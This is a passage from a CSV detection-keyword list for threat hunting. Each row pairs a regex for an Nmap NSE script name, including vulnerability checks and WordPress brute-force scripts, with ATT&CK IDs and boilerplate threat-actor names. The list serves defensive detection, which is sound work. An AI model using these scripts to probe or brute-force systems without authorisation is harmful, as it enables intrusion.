Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1543" "* https-redirect.nse*",".{0,1000}\shttps\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1544" "* http-stored-xss.nse*",".{0,1000}\shttp\-stored\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1545" "* http-svn-enum.nse*",".{0,1000}\shttp\-svn\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1546" "* http-svn-info.nse*",".{0,1000}\shttp\-svn\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1547" "* http-tenda-enum.nse*",".{0,1000}\shttp\-tenda\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","1548" "* http-title.nse*",".{0,1000}\shttp\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1549" "* http-tplink-dir-traversal.nse*",".{0,1000}\shttp\-tplink\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1550" "* http-trace.nse*",".{0,1000}\shttp\-trace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1551" "* http-traceroute.nse*",".{0,1000}\shttp\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1552" "* http-trane-info.nse*",".{0,1000}\shttp\-trane\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1553" "* http-unsafe-output-escaping.nse*",".{0,1000}\shttp\-unsafe\-output\-escaping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1554" "* http-useragent-tester.nse*",".{0,1000}\shttp\-useragent\-tester\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1555" "* http-userdir-enum.nse*",".{0,1000}\shttp\-userdir\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1556" "* http-vhosts.nse*",".{0,1000}\shttp\-vhosts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1557" "* http-virustotal.nse*",".{0,1000}\shttp\-virustotal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1558" "* http-vlcstreamer-ls.nse*",".{0,1000}\shttp\-vlcstreamer\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1559" "* http-vmware-path-vuln.nse*",".{0,1000}\shttp\-vmware\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1560" "* http-vuln-cve2006-3392.nse*",".{0,1000}\shttp\-vuln\-cve2006\-3392\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1561" "* http-vuln-cve2009-3960.nse*",".{0,1000}\shttp\-vuln\-cve2009\-3960\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1562" "* http-vuln-cve2010-0738.nse*",".{0,1000}\shttp\-vuln\-cve2010\-0738\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1563" "* http-vuln-cve2010-2861.nse*",".{0,1000}\shttp\-vuln\-cve2010\-2861\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1564" "* http-vuln-cve2011-3192.nse*",".{0,1000}\shttp\-vuln\-cve2011\-3192\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1565" "* http-vuln-cve2011-3368.nse*",".{0,1000}\shttp\-vuln\-cve2011\-3368\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1566" "* http-vuln-cve2012-1823.nse*",".{0,1000}\shttp\-vuln\-cve2012\-1823\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1567" "* http-vuln-cve2013-0156.nse*",".{0,1000}\shttp\-vuln\-cve2013\-0156\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1568" "* http-vuln-cve2013-6786.nse*",".{0,1000}\shttp\-vuln\-cve2013\-6786\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1569" "* http-vuln-cve2013-7091.nse*",".{0,1000}\shttp\-vuln\-cve2013\-7091\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1570" "* http-vuln-cve2014-2126.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2126\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1571" "* http-vuln-cve2014-2127.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2127\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1572" "* http-vuln-cve2014-2128.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2128\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1573" "* http-vuln-cve2014-2129.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2129\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1574" "* http-vuln-cve2014-3704.nse*",".{0,1000}\shttp\-vuln\-cve2014\-3704\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1575" "* http-vuln-cve2014-8877.nse*",".{0,1000}\shttp\-vuln\-cve2014\-8877\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1576" "* http-vuln-cve2015-1427.nse*",".{0,1000}\shttp\-vuln\-cve2015\-1427\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1577" "* http-vuln-cve2015-1635.nse*",".{0,1000}\shttp\-vuln\-cve2015\-1635\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1578" "* http-vuln-cve2017-1001000.nse*",".{0,1000}\shttp\-vuln\-cve2017\-1001000\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1579" "* http-vuln-cve2017-5638.nse*",".{0,1000}\shttp\-vuln\-cve2017\-5638\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1580" "* http-vuln-cve2017-5689.nse*",".{0,1000}\shttp\-vuln\-cve2017\-5689\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1581" "* http-vuln-cve2017-8917.nse*",".{0,1000}\shttp\-vuln\-cve2017\-8917\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1582" "* http-vulners-regex.nse*",".{0,1000}\shttp\-vulners\-regex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","N/A","10","3297","553","2024-04-03T11:53:29Z","2017-12-19T21:21:28Z","1583" "* http-vuln-misfortune-cookie.nse*",".{0,1000}\shttp\-vuln\-misfortune\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1584" "* http-vuln-wnr1000-creds.nse*",".{0,1000}\shttp\-vuln\-wnr1000\-creds\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1585" "* http-waf-detect.nse*",".{0,1000}\shttp\-waf\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1586" "* http-waf-fingerprint.nse*",".{0,1000}\shttp\-waf\-fingerprint\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1587" "* http-webdav-scan.nse*",".{0,1000}\shttp\-webdav\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1588" "* http-wordpress-brute.nse*",".{0,1000}\shttp\-wordpress\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1589" "* http-wordpress-enum.nse*",".{0,1000}\shttp\-wordpress\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
